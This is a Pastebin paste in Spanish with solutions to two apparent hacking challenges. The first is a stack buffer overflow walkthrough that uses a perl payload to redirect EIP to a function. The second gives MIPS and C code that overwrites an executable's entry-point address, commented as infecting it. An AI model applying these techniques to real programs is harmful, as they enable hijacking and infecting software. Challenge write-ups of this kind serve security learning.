Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [Solución Reto 1]
- Buscamos la dirección de la funcion execme:
- objdump -d execme
- Dirección = 08048404
- LEndian(08048404) = \x04\x84\x04\x08
- Averiguar offset hasta EIP probando (suponemos que está cerca del buffer, lo estará). Después de unas cuantas pruebas damos con él, 76.
- Input: perl -e 'print "X"x76 . "\x04\x84\x04\x08"' | ./stack
- Ouput:
- Ejecutame :)
- Segmentation fault (core dumped)
- Sabemos que el offset máximo del buffer son 64, empezaremos las pruebas con ese:
- perl -e 'print "X"x64 . "\x04\x84\x04\x08"' | ./stack
- perl -e 'print "X"x65 . "\x04\x84\x04\x08"' | ./stack
- .
- .
- .
- perl -e 'print "X"x76 . "\x04\x84\x04\x08"' | ./stack
- Si suponemos que el EIP está cerca con unas cuantas pruebas saltará y veremos la ejecución de la función execme -76-.
- [Solución Reto 2]
- ---------------------------------------------------------
- MIPS R2000 (32BIT):
- ---------------------------------------------------------
- .data 0x10000000
- path: .asciiz "test.exe"
- ## File inftest.exe must exist ##
- pathi: .asciiz "inftest.exe"
- ## Size of file ##
- buffer: .space 600000
- .globl __start
- .text 0x00400000
- __start: # Open File Read#
- la $a0,path
- li $a1,0
- jal _openFile
- ## Read File ##
- jal _readFile
- ## Change EP ##
- jal _change
- ## Close Exe ##
- jal _close
- ## Open File Write ##
- la $a0,pathi
- li $a1,1
- jal _openFile
- ## Rewrite Exe ##
- jal _write
- ## Close Exe ##
- jal _close
- ## Print Test##
- #jal _print
- ## Exit ##
- li $v0,10
- syscall
- _write: li $v0,15
- move $a0,$s6
- la $a1,buffer
- li $a2,600000
- syscall
- jr $ra
- _change: la $a0,buffer
- addu $a0,$a0,0x0A8 # EP offset
- ## Save 1st byte of ep address ##
- li $a1,0x3c
- sb $a1,0($a0)
- ## You can modify all bytes of 32bit address chaining the instructions appeared before ##
- jr $ra
- _openFile: li $v0,13
- la $a2,0
- syscall
- move $s6,$v0 # Saving descriptor
- jr $ra
- _readFile: li $v0,14
- move $a0,$s6 # $a0 -> descriptor
- la $a1,buffer
- li $a2,600000
- syscall
- jr $ra
- _close: li $v0, 16
- move $a0,$s6
- syscall
- jr $ra
- _print: li $t0,600000
- li $v0,11
- la $t1,buffer
- loop: lb $a0,0($t1)
- syscall
- addiu $t0,-1
- addiu $t1,1
- bne $t0,$zero,loop
- jr $ra
- ---------------------------------------------------------
- C (LINUX)
- ---------------------------------------------------------
- #include <stdio.h>
- #include <sys/types.h>
- #include <sys/mman.h>
- #include <fcntl.h>
- #include <unistd.h>
- // Move a byte pointer from init address of projection to offset 0x0A8 where a
- // 4B pointer, will read 4B of Address Entry Point
- int main(int argc,char* argv[])
- {
- char *p,*org;
- int *t;
- int fd;
- struct stat bstat;
- fd = open(argv[1],O_RDWR);
- fstat(fd,&bstat); // Dump descriptor as structure in bstat
- org = mmap((caddr_t)0,bstat.st_size,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0); // Init projection
- p = org;
- //printf("First addr %p\n", p);
- p += 0x0A8; // Offset to AddressEntryPoint
- t = (int*)p; // Cast pointer to read 4 bytes
- //printf("Second addr %p\n", p);
- printf("Current EP: %d\n",*t); // Current EP (dec)
- *t = 0x1337; // EP to infect
- munmap(org, bstat.st_size); // Finish projection
- close(fd);
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement